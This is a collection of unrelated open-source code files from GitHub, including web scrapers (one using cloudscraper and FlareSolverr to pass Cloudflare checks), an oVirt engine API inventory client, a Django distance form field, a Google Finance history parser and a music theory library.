simulation_gui()","repo_name":"lauramedlock/NetPyNE_Project","sub_path":"cells/ais_main.py","file_name":"ais_main.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"37076917638","text":"# \"Clicking\" a link just means finding its URL and opening it with urlopen\r\n\r\nimport urllib.request as req\r\nfrom bs4 import BeautifulSoup #pip install beautifulsoup4\r\n\r\nyour_champ = input(\"당신의 챔프>>\")\r\nheaders = req.Request(\"https://www.op.gg/champion/statistics\", headers={\"Accept-Language\":\"ko-KR\"}) # fetch the Korean-language HTML as-is\r\ncode = req.urlopen(headers)\r\nsoup = BeautifulSoup(code, \"html.parser\")\r\n\r\nchamp_list = soup.select(\"div.champion-index__champion-list > div\")\r\nfor i in champ_list:\r\n    if i.attrs[\"data-champion-name\"] == your_champ:\r\n        a = i.select_one(\"a\")\r\n        champ_url = \"https://www.op.gg\" + a.attrs[\"href\"]\r\n        break\r\nheaders = req.Request(champ_url, headers={\"Accept-Language\":\"ko-KR\"}) # fetch the Korean-language HTML as-is\r\ncode = req.urlopen(headers)\r\nsoup = BeautifulSoup(code, \"html.parser\")\r\ncounter_tab = soup.select_one(\"li.champion-stats-menu__list__item.champion-stats-menu__list__item--red.tabHeader > a\")\r\n\r\ncounter_url = \"https://www.op.gg\" + counter_tab.attrs[\"href\"]\r\nheaders = req.Request(counter_url, headers={\"Accept-Language\":\"ko-KR\"}) # fetch the Korean-language HTML as-is\r\ncode = req.urlopen(headers)\r\nsoup = BeautifulSoup(code, \"html.parser\")\r\ncounter = soup.select(\"div.champion-matchup-list__champion > span:nth-child(2)\")\r\nfor i in counter:\r\n    
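# print each counter champion's name (the text of the matched span)\r\n    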
print(i.string)\r\n","repo_name":"mjkimcs/portfolio","sub_path":"웹스크래핑/11d_ 속도향상_LOL게임.py","file_name":"11d_ 속도향상_LOL게임.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"69906153208","text":"\"\"\"\nClasses that gets data from engine API\n\"\"\"\n\nimport requests\n\nfrom helpers.config import api as api_config\n\n\nclass RhvmApi:\n \"\"\"\n Class that processes API calls\n \"\"\"\n\n # dict with values for sections api, ssh and other\n config = None\n # part of url for api (with / in the end)\n api_url = \"\"\n # server http adress (without / in the end)\n server_url = \"\"\n\n def __init__(self, config, server):\n self.config = config\n self.server_url = \"https://%s\" % server\n\n self.api_url = self.config[\"api\"][\"URL\"]\n if self.api_url[-1] != \"/\":\n self.api_url += \"/\"\n if self.api_url[0] != \"/\":\n self.api_url = \"/\" + self.api_url\n\n requests.packages.urllib3.disable_warnings()\n\n def get_api_url_part(self, url_part=\"\"):\n \"\"\"\n Get proper address as url part for sel.get()\n\n Arguments:\n url_part (str): url address part to process\n Returns: (str) url part for self.get()\n \"\"\"\n return url_part.replace(self.api_url, \"\")\n\n def get(self, url_part=\"\", data=None):\n \"\"\"\n Get data from api\n\n Arguments:\n url_part (str): url address part to call (after adress to api e.g.\n /ovirt-engine/api)\n Returns: (dict) data from api call\n Raises: (ApiException) In case api call was not sucessfull\n \"\"\"\n url = self.server_url + self.api_url + url_part\n api_result = requests.get(\n url,\n auth=(self.config[\"api\"][\"USER\"], self.config[\"api\"][\"PASSWORD\"]),\n data=data,\n headers={\"Accept\": \"application/json\", \"Prefer\": \"persistent-auth\"},\n verify=False,\n )\n try:\n return api_result.json()\n except Exception:\n raise ApiException(\"GET {}: {}\".format(url, str(api_result)))\n\n\nclass ApiData:\n \"\"\"\n Class that processes data from API\n \"\"\"\n\n config = None\n server = \"\"\n\n def __init__(self, config, server):\n self.config = config\n self.server = server\n self.api = RhvmApi(config, server)\n\n def get_link(self, links, name):\n \"\"\"\n Get proper url from links in api data\n\n Arguments:\n links (list): links in api data\n name (str): rel name of the link\n Returns: (str/None) found url for the link, None otherwise\n \"\"\"\n for link in links:\n if \"rel\" in link and link[\"rel\"] == name:\n return self.api.get_api_url_part(link[\"href\"])\n return None\n\n def set_authentication(self, data):\n \"\"\"\n Set authentication values for provider\n\n Arguments:\n data (dict): data where the authentication should be set\n \"\"\"\n if \"requires_authentication\" in data:\n data[\"authentication\"] = {\n key: data.get(key, \"\") for key in api_config.EXT_PROVIDER_AUTH_KEYS\n }\n\n def get_externalprovider_data(self, links):\n \"\"\"\n Get network external providers from links in api data\n\n Arguments:\n links (list): links in api data\n Returns: (list) list of network providers\n \"\"\"\n providers = []\n ext_link = self.get_link(links, \"externalnetworkproviders\")\n if ext_link:\n data_provider = self.api.get(ext_link)\n if \"external_provider\" in data_provider:\n for provider in data_provider[\"external_provider\"]:\n self.set_authentication(provider)\n providers.append(provider)\n return providers\n\n def get_cluster_data(self):\n \"\"\"\n Get clusters api data\n\n Returns: (list) clusters data\n \"\"\"\n clusters = []\n 
data_clusters = self.api.get(\"clusters\")\n for cluster in data_clusters[\"cluster\"]:\n cluster[\"version\"] = \"{}.{}\".format(\n cluster[\"version\"][\"major\"], cluster[\"version\"][\"minor\"]\n )\n if \"cpu\" in cluster:\n cluster[\"cpu_type\"] = cluster[\"cpu\"][\"type\"]\n else:\n cluster[\"cpu_type\"] = \"{{ cpu_type }}\"\n cluster[\"external_providers\"] = self.get_externalprovider_data(\n cluster[\"link\"]\n )\n data_macpool = self.api.get(\n self.api.get_api_url_part(cluster[\"mac_pool\"][\"href\"])\n )\n cluster[\"mac_pool_name\"] = data_macpool[\"name\"]\n\n clusters.append(cluster)\n\n return clusters\n\n def get_host_data(self):\n \"\"\"\n Get hosts api data\n\n Returns: (list) hosts data\n \"\"\"\n hosts = []\n data_hosts = self.api.get(\"hosts\")\n for host in data_hosts.get(\"host\", []):\n try:\n host[\"os_version\"] = \"{os_type}-{major_ver}.{minor_ver}\".format(\n os_type=host[\"os\"][\"type\"],\n major_ver=host[\"os\"][\"version\"][\"major\"],\n minor_ver=host[\"os\"][\"version\"].get(\"minor\", \"x\"),\n )\n except KeyError:\n host[\"os_version\"] = \"\"\n data_cluster = self.api.get(\n self.api.get_api_url_part(host[\"cluster\"][\"href\"])\n )\n host[\"cluster\"] = data_cluster[\"name\"]\n hosts.append(host)\n\n return hosts\n\n def get_storage_data(self):\n \"\"\"\n Get storages api data\n\n Returns: (list) storages data\n \"\"\"\n storages = []\n data_storages = self.api.get(\"storagedomains\")\n for storage in data_storages.get(\"storage_domain\", []):\n storage_ad = storage[\"storage\"]\n if storage[\"type\"] == \"image\":\n continue\n if storage_ad[\"type\"] == \"nfs\":\n storage[\"nfs\"] = storage_ad\n elif storage_ad[\"type\"] == \"iscsi\":\n luns = storage_ad[\"volume_group\"][\"logical_units\"]\n if not isinstance(luns[\"logical_unit\"], list):\n luns = [luns[\"logical_unit\"]]\n else:\n luns = luns[\"logical_unit\"]\n for lun in luns:\n if \"iscsi\" not in storage:\n lun_id = lun[\"id\"]\n lun.pop(\"id\")\n storage[\"iscsi\"] = lun\n storage[\"iscsi\"][\"luns\"] = [{\"value\": lun_id}]\n else:\n storage[\"iscsi\"][\"luns\"].append({\"value\": lun_id})\n storage[\"state\"] = \"present\" # for testing is enough\n if storage[\"type\"] != \"data\":\n storage[\"domain_function\"] = {\"value\": storage[\"type\"]}\n storages.append(storage)\n\n return storages\n\n def get_macpool_data(self):\n \"\"\"\n Get mac pools api data\n\n Returns: (list) mac pools data\n \"\"\"\n macpools = []\n data_macpools = self.api.get(\"macpools\")\n for macpool in data_macpools[\"mac_pool\"]:\n macpool_pom = {\"name\": macpool[\"name\"], \"ranges\": []}\n for mac_range in macpool[\"ranges\"][\"range\"]:\n macpool_pom[\"ranges\"].append(mac_range[\"from\"] + \",\" + mac_range[\"to\"])\n macpools.append(macpool_pom)\n return macpools\n\n def get_ext_provider_data(self):\n \"\"\"\n Get data external providers api data (from helpers.config.api)\n\n Returns: (list) external providers data\n \"\"\"\n providers = []\n for conf_item in api_config.EXT_PROVIDERS:\n data_providers = self.api.get(conf_item[\"url\"])\n if data_providers:\n for provider in data_providers[conf_item[\"variable\"]]:\n provider[\"type\"] = conf_item[\"type\"]\n provider[\"state\"] = \"present\" # for testing is enough\n self.set_authentication(provider)\n providers.append(provider)\n\n return providers\n\n def get_vm_data(self):\n \"\"\"\n Get VMs api data\n\n Returns: (list) VMs data\n \"\"\"\n vms = []\n data_vms = self.api.get(\"vms\")\n for vm in data_vms.get(\"vm\", []):\n vm[\"tag\"] = \"\"\n tags_link = 
self.get_link(vm[\"link\"], \"tags\")\n if tags_link:\n data_tag = self.api.get(tags_link)\n if data_tag:\n tags = []\n for tag in data_tag[\"tag\"]:\n tags.append(tag[\"name\"])\n vm[\"tag\"] = \",\".join(tags)\n vms.append(vm)\n\n return vms\n\n def get_domain_data(self):\n \"\"\"\n Get user's domains api data\n\n Returns: (list) domains data\n \"\"\"\n domains = []\n data_domains = self.api.get(\"domains\")\n for domain in data_domains[\"domain\"]:\n domain[\"groups\"] = []\n group_link = self.get_link(domain[\"link\"], \"groups\")\n data_groups = self.api.get(group_link)\n if data_groups:\n for group in data_groups[\"group\"]:\n domain[\"groups\"].append(\n {\n \"name\": group[\"name\"],\n \"authz_name\": domain[\"name\"],\n \"users\": [],\n }\n )\n\n domain[\"users\"] = []\n user_link = self.get_link(domain[\"link\"], \"users\")\n data_users = self.api.get(user_link)\n if data_users:\n for user in data_users[\"user\"]:\n user[\"authz_name\"] = domain[\"name\"]\n if \"department\" not in user:\n user[\"department\"] = \"\"\n if user[\"groups\"]:\n for group in user[\"groups\"][\"group\"]:\n for group2 in domain[\"groups\"]:\n if group[\"name\"] == group2[\"name\"]:\n group2[\"users\"].append({\"value\": user[\"principal\"]})\n domain[\"users\"].append(user)\n\n domains.append(domain)\n\n return domains\n\n def get_user_data(self, domains=[]):\n \"\"\"\n Get users api data\n\n Arguments:\n domains (list): if defined, return only for specific user's domains\n Returns: (list) users data\n \"\"\"\n users = []\n data_users = self.api.get(\"users\")\n for user in data_users.get(\"user\", []):\n if domains and user[\"domain\"][\"name\"] not in domains:\n continue\n user[\"authz_name\"] = user[\"domain\"][\"name\"]\n if \"department\" not in user:\n user[\"department\"] = \"\"\n if \"name\" not in user:\n user[\"name\"] = \"\"\n users.append(user)\n\n return users\n\n def get_group_data(self):\n \"\"\"\n Get user's groups api data\n\n Returns: (list) groups data\n \"\"\"\n groups = []\n domains = self.get_domain_data()\n for domain in domains:\n if domain[\"groups\"]:\n for group in domain[\"groups\"]:\n groups.append(group)\n\n return groups\n\n def get_engine_data(self):\n \"\"\"\n Get engines api data\n\n Returns: (dict) engines data\n Raises: (ApiException) In case api data can't be loaded\n \"\"\"\n try:\n data = self.api.get()\n data[\"name\"] = self.server\n data[\"username\"] = self.config[\"api\"][\"USER\"]\n data[\"password\"] = self.config[\"api\"][\"PASSWORD\"]\n data[\"root_password\"] = self.config[\"ssh\"][\"PASSWORD\"]\n data[\"version\"] = \"{}.{}\".format(\n data[\"product_info\"][\"version\"][\"major\"],\n data[\"product_info\"][\"version\"][\"minor\"],\n )\n\n data[\"mac_pools\"] = self.get_macpool_data()\n data[\"clusters\"] = self.get_cluster_data()\n data[\"hosts\"] = self.get_host_data()\n data[\"storages\"] = self.get_storage_data()\n data[\"nfs_server\"] = \"\"\n for storage in data[\"storages\"]:\n if not data[\"nfs_server\"] and \"nfs\" in storage:\n data[\"nfs_server\"] = storage[\"nfs\"][\"address\"]\n\n data[\"external_providers\"] = self.get_ext_provider_data()\n data[\"vms\"] = self.get_vm_data()\n data[\"users\"] = self.get_user_data()\n data[\"groups\"] = self.get_group_data()\n\n return data\n except ApiException as ex:\n raise ex\n except Exception as ex:\n raise ApiException(\"Error getting data: {}\".format(ex))\n\n\nclass ApiException(Exception):\n \"\"\"\n Class for API exceptions\n \"\"\"\n\n def __str__(self):\n return \"[API] 
{}\".format(self.message)\n","repo_name":"grafuls/disruption_generator","sub_path":"disruption_generator/tools/ovirt-inventory/helpers/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":12762,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"1905291383","text":"import numpy as np\nimport os\nimport shutil\n\n\n\n########################################################################\n\n\nclass DataSet:\n def __init__(self, in_dir, exts='.jpg'):\n \n # Extend the input directory to the full path.\n in_dir = os.path.abspath(in_dir)\n # Input directory.\n self.in_dir = in_dir\n # Convert all file-extensions to lower-case.\n self.exts = tuple(ext.lower() for ext in exts)\n\n # Filenames for all the files in the training-set.\n self.filenames = []\n # Filenames for all the files in the test-set.\n #self.filenames_test = []\n\n # For all files/dirs in the input directory.\n for (dirpath, dirnames, filenames) in os.walk(in_dir):\n for file in filenames:\n self.filenames.append(file)\n \n\n \n def get_paths(self, test=False):\n \"\"\"\n Get the full paths for the files in the data-set.\n :param test:\n Boolean. Return the paths for the test-set (True) or training-set (False).\n :return:\n Iterator with strings for the path-names.\n \"\"\"\n\n for filename in self.filenames:\n # Full path-name for the file.\n path = os.path.join(self.in_dir,filename)\n\n yield str(path)\n\n \n def get_training_set(self):\n \"\"\"\n Return the list of paths for the files in the training-set,\n and the list of class-numbers as integers,\n and the class-numbers as one-hot encoded arrays.\n \"\"\"\n\n return list(self.get_paths())#,\\\n #list(self.get_label())\n #np.asarray(self.class_numbers), \\\n #one_hot_encoded(class_numbers=self.class_numbers,\n # num_classes=self.num_classes)\n\n \n\n\n\n########################################################################\n\n\n\n\n ### reference 'https://github.com/Hvass-Labs/TensorFlow-Tutorials/blob/master/dataset.py'","repo_name":"tanintem/deepsky-updater","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5293634137","text":"from django.core.exceptions import ValidationError\nfrom django.forms.fields import FloatField, MultiValueField, ChoiceField\nfrom django.forms.widgets import MultiWidget, NumberInput, Select\n\nfrom django.contrib.gis.measure import D\n\n\nclass DistanceWidget(MultiWidget):\n def __init__(self, *args, choices=[], **kwargs):\n child_widgets = (\n NumberInput(),\n Select(choices=choices)\n )\n super().__init__(child_widgets, *args, **kwargs)\n\n def decompress(self, distance):\n if not isinstance(distance, D):\n distance = D(ft=distance)\n return [distance.ft, distance._default_unit]\n\n\nclass DistanceField(MultiValueField):\n widget = DistanceWidget\n\n DISTANCE_UNITS = [(\"ft\", \"feet\"),\n (\"m\", \"meters\"),\n (\"km\", \"km\"),\n (\"mi\", \"miles\")]\n\n def __init__(self, *args, min_value=D(m=10), max_value=D(m=100),\n initial_unit=\"ft\", **kwargs):\n error_messages = {\n \"incomplete\": \"Enter a distance\"\n }\n self.min_value = min_value\n self.max_value = max_value\n fields = (\n FloatField(),\n ChoiceField(choices=self.DISTANCE_UNITS,\n initial=initial_unit)\n )\n super().__init__(\n fields=fields,\n error_messages=error_messages,\n require_all_fields=True,\n *args, **kwargs\n )\n self.widget = 
DistanceWidget(choices=self.DISTANCE_UNITS)\n\n def clean(self, val):\n val = super().clean(val)\n if self.min_value and val < self.min_value:\n unit = val._default_unit\n min_as_unit = getattr(self.min_value, unit)\n raise ValidationError(f\"must be at least {min_as_unit} {unit}\")\n elif self.max_value and val > self.max_value:\n unit = val._default_unit\n max_as_unit = getattr(self.max_value, unit)\n raise ValidationError(f\"must be no more than {max_as_unit} {unit}\")\n\n return val\n\n def compress(self, values):\n return D(**{values[1]: values[0]})\n","repo_name":"codeforboston/cornerwise","sub_path":"server/shared/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"73229145210","text":"import csv\n\n\nsolutionPaths = [\"../lab7/solutions/TSPA/lsn_with_ls.csv\", \n \"../lab7/solutions/TSPB/lsn_with_ls.csv\", \n \"../lab7/solutions/TSPC/lsn_with_ls.csv\", \n \"../lab6/solutions/TSPD/ils.csv\"]\n\n\nfor solPath in solutionPaths:\n instanceName = solPath.split('/')[-2]\n with open(solPath, 'r') as f:\n reader = csv.reader(f)\n solution = [int(node[0]) for node in list(reader)]\n print(f\"{instanceName}: {', '.join(map(str, solution))}\\n\")\n ","repo_name":"alessandro1802/evo_comp","sub_path":"scripts/print_best_solutions.py","file_name":"print_best_solutions.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14019332518","text":"# we need to see full text, so we have to go thru all our saved pages, see if they have any \"cut\" and if so, put the link into csv file\nimport csv\nimport os\nimport bs4\n\ndef main():\n dir = r\"D:\\projects\\LiveJournal\\data\\html_pages\"\n for file in os.scandir(dir):\n name = file.name\n link = r\"D:\\projects\\LiveJournal\\data\\html_pages\" + \"\\\\\" + name\n with open(link, encoding='utf-8', newline='') as l:\n soup = bs4.BeautifulSoup(l, \"html.parser\")\n posts = soup.find_all(\"article\")\n for post in posts:\n cuts = post.find_all(\"b\", class_=\"ljcut-link lj-widget\")\n if not cuts:\n continue\n else:\n post_url = post.find(\"h3\", class_=\"entryunit__title\").find(\"a\").get(\"href\")\n with open (\"../data/posts_with_cut.csv\", \"a\", newline=\"\\n\") as output:\n writer = csv.writer(output, delimiter=',')\n writer.writerow([post_url])\n\n","repo_name":"vsomova/lj-nssi","sub_path":"code/06-save-posts-with-cut.py","file_name":"06-save-posts-with-cut.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23704252448","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport scrapy\n\nfrom dateutil import parser\n\nfrom ..items import CensusItem\n\nclass CensusPageSpider(scrapy.Spider):\n name = 'census_page'\n allowed_domains = ['www.phila.gov']\n start_urls = ['http://www.phila.gov/prisons/inmatesupport/Pages/Census.aspx']\n\n facilities = ['ASD ASDCU', 'ASD Cambria', 'ASD Cannery', 'ASD MOD 3',\n 'ASD WRP-UNIV. 
AVE', 'CFCF', 'DC-DETENTION CENTER', 'DC-PHSW',\n            'HOC', 'PICC', 'RCF', 'Weekenders', 'PDP \"In Facility\" Count'\n            ]\n\n    def parse(self, response):\n\n        named_row = '''//div[contains(@id,'Census_')]/table/tr/td''' + \\\n            '''[contains(normalize-space(text()),'%s')]/parent::tr/td'''\n\n        date_row = response.xpath(named_row % ('CENSUS FOR',))\n\n        if date_row is not None:\n\n            date_text = self.clean_space(date_row[1].xpath('text()').extract_first())\n            \n            try:\n                dt = parser.parse(date_text).date()\n            except:\n                dt = None\n        else:\n            dt = None\n\n        for facility_name in self.facilities:\n            data = response.xpath(named_row % (facility_name,))\n            census = CensusItem(\n                facility=self.clean_space(data[0].xpath('text()').extract_first()),\n                date=dt)\n\n            for i in range(len(census.ordered_fields)):\n                field = census.ordered_fields[i]\n                census[field] = self.as_int(\n                    data[i + 1].xpath('text()').extract_first())\n\n            yield census \n\n    # Helpers\n\n    @staticmethod\n    def clean_space(text):\n        return re.sub(\"[\\s]+\", \" \", text.strip())\n\n\n    @staticmethod\n    def as_int(text):\n\n        if text is None:\n            return\n\n        if type(text) is int:\n            return text\n\n\n        numbers = re.sub(\"[^\\d]\", \"\", text)\n\n        try:\n            number = int(numbers)\n        except:\n            number = None\n\n        return number\n","repo_name":"ptvirgo/yasp","sub_path":"pdp_scraper/spiders/census_page.py","file_name":"census_page.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"26853004982","text":"import time\nimport logging\nimport requests\nimport cloudscraper\nfrom scrapers.meta import Singleton\n\nclass ClientException(Exception):\n    pass\n\nclass Client(metaclass=Singleton):\n    \n    def __init__(self, \n                 config, \n                 logger: logging.Logger = logging.getLogger('client')):\n        self.config = config \n        self.logger = logger\n        self.cookies = None\n        self.user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36'\n        self.requests = cloudscraper.create_scraper()\n    \n    def _get(self, url):\n        # The idea is simple: try the request once first; if the Cloudflare check fails, use FlareSolverr to solve the challenge (and update the cookies)\n        try:\n            resp = self.requests.get(url, cookies=self.cookies, timeout=self.config.max_timeout, headers={\n                'User-Agent': self.user_agent\n            })\n            # Check whether the request succeeded\n            if resp and resp.status_code == 200:\n                return resp.text\n            else:\n                raise ClientException(f'Request failed, status code: {resp.status_code}')\n        except (cloudscraper.exceptions.CloudflareChallengeError, ClientException) as e:\n            resp = requests.post(self.config.flaresolverr_url, headers={'Content-Type': 'application/json'}, json={\n                \"cmd\": \"request.get\",\n                \"url\": url,\n                \"maxTimeout\": self.config.max_timeout * 1000,\n            }, timeout=self.config.max_timeout)\n            if resp and resp.status_code == 200:\n                j = resp.json()\n                if j and j.get('status') == 'ok':\n                    self.logger.info(f'FlareSolverr request succeeded, updating cookies')\n                    self.cookies = {i['name']:i['value'] for i in j['solution']['cookies']}\n                    self.user_agent = j['solution']['userAgent']\n                    return j['solution']['response']\n                else:\n                    self.logger.error(f'FlareSolverr request failed, the Cloudflare challenge was probably not solved')\n            else:\n                self.logger.error(f'FlareSolverr request failed, the FlareSolverr server may not be running')\n            raise Exception(f'Request failed, status code: {resp.status_code}')\n    \n    def get(self, url):\n        retry = 0\n        self.logger.debug(f'Starting request, attempt: {retry}')\n        while retry < self.config.retry:\n            try:\n                return self._get(url)\n            except Exception as e:\n                self.logger.error(f'Request failed, retrying: {e}')\n                time.sleep(self.config.delay)\n                retry += 1\n        self.logger.error(f'Request failed, exceeded the maximum number of retries: 
{self.config.retry}')\n        return None\n    \nif __name__ == '__main__':\n    \n    class FlareSolverrConfig:\n        flaresolverr_url: str = 'http://localhost:8191/v1'\n        max_timeout = 60\n        retry: int = 5\n        delay: int = 5\n    \n    config = FlareSolverrConfig()\n    client = Client(config)\n    for i in range(2):\n        print(client.get('https://www.google.com/'))","repo_name":"aitay721822/AdmissionScraper","sub_path":"scrapers/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"14746563143","text":"\"\"\"\nprocessing results from finance APIs\n\"\"\"\n\nimport csv\nimport re\nimport numpy as np\n\n# Google Finance API example\n# https://www.google.com/finance/getprices?q=2330&x=TPE&i=3600&p=10d&f=d,c,h,l,o,v\n\ndef process_google_finance_history(gf_history_file):\n    \"\"\"\n    Process a downloaded stock history\n\n    Args:\n        gf_history_file: the path to the google finance history csv file\n\n    Returns:\n        A numpy array\n    \"\"\"\n\n    interval = 86400\n    timestamp = None\n    current_timestamp = None\n    processed = []\n\n    for row in csv.reader(open(gf_history_file, 'r')):\n        if len(row) == 0:\n            continue\n        if row[0].startswith('INTERVAL='):\n            interval = int(row[0].split('INTERVAL=')[-1])\n        if re.findall(r'^[a0-9]', row[0]):\n            date = row[0]\n            # absolute timestamp\n            if date.startswith('a'):\n                current_timestamp = timestamp = float(date.split('a')[-1])\n            # relative offset\n            else:\n                offset = int(date)\n                current_timestamp = timestamp + offset * interval\n            row[0] = current_timestamp\n            row[1:] = [float(value) for value in row[1:]]\n            processed.append(row)\n    return np.array(processed)\n\nif __name__ == '__main__':\n\n    process_google_finance_history('data/2330')\n","repo_name":"maxis1718/reversal","sub_path":"reversal/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"33451459382","text":"import pandas as pd\n\npath = 'dump02t.csv'\n\ncsv = pd.read_csv(path, delimiter=';', dtype='str')\n\nrts = 0\nfor tweet in csv['full_text']:\n    if tweet.startswith('RT @'):\n        rts += 1\n    else:\n        print(tweet)\n\ntotal = len(csv)\nprint('Total tweets:', total)\nprint('\\t RTs:', rts)\nprint('\\t Non RTs:', (total-rts))","repo_name":"JavierBJ/gender-politics-twitter","sub_path":"tweets/describe_csv.py","file_name":"describe_csv.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"42955027626","text":"import re\nimport numpy as np\n\nclass Note:\n\n    notes = ['C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B']\n\n    def __init__(self, note_name, octave=4):\n        self.note_name = note_name\n        self.octave = octave\n\n    def shift(self, halftone=0):\n        idx_curr = Note.notes.index(self.note_name)\n        semitone_new = idx_curr + halftone\n        idx_new = semitone_new % len(Note.notes)\n        note_name_new = Note.notes[idx_new]\n        octave_new = self.octave + semitone_new // len(Note.notes)\n        return Note(note_name_new, octave=octave_new)\n\n    def interval(self, name):\n        '''\n        https://www.earmaster.com/products/free-tools/interval-song-chart-generator.html\n        '''\n        interval_halftone_map = {\n            0: ['perfect_unison', 'P1'],\n            1: ['minor_second', 'm2'],\n            2: ['major_second', 'M2'],\n            3: ['minor_third', 'm3'],\n            4: ['major_third', 'M3'],\n            5: ['perfect_fourth', 'P4'],\n            6: ['augmented_fourth', 'A4', 'diminished_fifth', 'd5', 
'tritone', 'tt'],\n            7: ['perfect_fifth', 'P5'],\n            8: ['minor_sixth', 'm6', 'augmented_fifth', 'A5'],\n            9: ['major_sixth', 'M6', 'diminished_seventh', 'd7'],\n            10: ['minor_seventh', 'm7'],\n            11: ['major_seventh', 'M7'],\n            12: ['perfect_octave', 'P8']\n        }\n        for halftone, interval_names in interval_halftone_map.items():\n            if name in interval_names:\n                break\n        return self.shift(halftone=halftone)\n\n    def get_str(self, print_octave=False):\n        s = f'{self.note_name}'\n        if print_octave:\n            s += f'{self.octave}'\n        return s\n\n    def is_natural(note_name):\n        if ('#' in note_name) or ('b' in note_name):\n            return False\n        else:\n            return True\n\nclass Notes:\n\n    def __init__(self, input_notes):\n        '''\n        `notes` is a list of Note objects or strings of note_names\n        '''\n        curr_notes = []\n        for input_note in input_notes:\n            if isinstance(input_note, str):\n                curr_notes.append(Note(input_note))\n            else:\n                curr_notes.append(input_note)\n        self.notes = curr_notes\n\n    def get_str(self, print_octave=False):\n        l = []\n        for note in self.notes:\n            l.append(note.get_str(print_octave=print_octave))\n        return ' '.join(l)\n\n    def __str__(self):\n        return self.get_str()\n\n    def __contains__(self, note):\n        '''\n        Checks if a note is in this set of notes\n        '''\n        note_names = [n.note_name for n in self.notes]\n        if note.note_name in note_names:\n            return True\n        else:\n            return False\n\n    def from_intervals(root_name, interval_names, octave=4):\n        note_root = Note(root_name, octave=octave)\n        notes = []\n        for interval_name in interval_names:\n            notes.append(note_root.interval(interval_name))\n        return notes\n\nclass Chord(Notes):\n\n    chord_interval_map = {\n        # triad\n        '': ['P1', 'M3', 'P5'],\n        'M': ['P1', 'M3', 'P5'],\n        'm': ['P1', 'm3', 'P5'],\n        'dim': ['P1', 'm3', 'd5'],\n        'aug': ['P1', 'M3', 'A5'],\n\n        # seventh\n        'M7': ['P1', 'M3', 'P5', 'M7'],\n        'm7': ['P1', 'm3', 'P5', 'm7'],\n        '7': ['P1', 'M3', 'P5', 'm7'],\n        'dim7': ['P1', 'm3', 'd5', 'd7'],\n        'aug7': ['P1', 'M3', 'A5', 'm7']\n    }\n\n    def from_symbol(symbol):\n        match = re.search('(\\w#*)(m|M|dim|aug)*(\\d*)', symbol)\n        root = match.group(1)\n        quality = match.group(2) if match.group(2) is not None else ''\n        extension = match.group(3)\n        chord_name = quality + extension\n        return root, chord_name\n\n    def __init__(self, symbol, octave=4):\n        root_name, chord_name = Chord.from_symbol(symbol)\n        self.root = Note(root_name, octave=octave)\n        self.chord_name = chord_name\n        interval_names = Chord.chord_interval_map[chord_name]\n        notes = Notes.from_intervals(root_name, interval_names, octave=octave)\n        super().__init__(notes)\n\nclass Scale(Notes):\n\n    scale_interval_map = {\n        'major': ['P1', 'M2', 'M3', 'P4', 'P5', 'M6', 'M7'],\n        'minor': ['P1', 'M2', 'm3', 'P4', 'P5', 'm6', 'm7'],\n        'harmonic_minor': ['P1', 'M2', 'm3', 'P4', 'P5', 'm6', 'M7'],\n        'major_pentatonic': ['P1', 'M2', 'M3', 'P5', 'M6'],\n        'minor_pentatonic': ['P1', 'm3', 'P4', 'P5', 'm7'],\n    }\n\n    def __init__(self, root_name, scale_name='major', octave=4):\n        self.root = Note(root_name, octave=octave)\n        self.scale_name = scale_name\n        interval_names = Scale.scale_interval_map[scale_name]\n        notes = Notes.from_intervals(root_name, interval_names, octave=octave)\n        super().__init__(notes)\n\nclass Fretboard:\n\n    def __init__(self, tuning=['E3', 'A3', 'D4', 'G4', 'B4', 'E5'], max_fret=22):\n        strings = []\n        for open_string in tuning:\n            note_name = open_string[0]\n            octave = int(open_string[1])\n            open_string_note = Note(note_name, octave=octave)\n            string = []\n            for halftone in range(max_fret + 1):\n                
